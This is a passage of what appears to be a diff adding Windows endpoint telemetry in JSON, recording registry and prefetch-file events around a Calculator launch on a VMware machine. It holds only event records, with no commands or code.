"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + 
"timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", + "registry_value": "ButtonForegroundColor", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + 
"registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", + "registry_value": "ButtonHoverBackgroundColor", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", + "registry_value": "ButtonHoverForegroundColor", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", + "registry_value": "ButtonPressedBackgroundColor", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", + "registry_value": "ButtonPressedForegroundColor", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", + "registry_value": 
"ButtonBackgroundColorInactive", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", + "registry_value": "ButtonForegroundColorInactive", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": 
"C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883573248860000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883573248860000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883573248860000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", + "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", + "timestamp": 131883573249009984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3\\ShowInSwitchers", + "registry_value": "ShowInSwitchers", + "timestamp": 131883573249009984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", + "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", + "timestamp": 131883573249170000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883573249170000, + "unique_pid": 
"{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573249330000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573249330000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573249330000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 5824, + "process_name": "SearchIndexer.exe", + "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", + "registry_value": "NewClientID", + "timestamp": 131883573249330000, + "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", + "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", + "timestamp": 131883573249330000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ImmersiveShell\\PersistedApplicationData\\Volatile", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ImmersiveShell\\PersistedApplicationData\\Volatile\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249480000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "file", + "file_name": "REGSVR32.EXE-55A4EE79.pf", + "file_path": "C:\\Windows\\Prefetch\\REGSVR32.EXE-55A4EE79.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573249640000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "file", + "file_name": "REGSVR32.EXE-A65A209D.pf", + "file_path": "C:\\Windows\\Prefetch\\REGSVR32.EXE-A65A209D.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573249640000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "file", + "file_name": "CALC.EXE-AC08706A.pf", + "file_path": 
"C:\\Windows\\Prefetch\\CALC.EXE-AC08706A.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573249640000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", + "registry_value": "ButtonBackgroundColor", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": 
"registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", + "registry_value": "ButtonForegroundColor", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", + "registry_value": "ButtonHoverBackgroundColor", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": 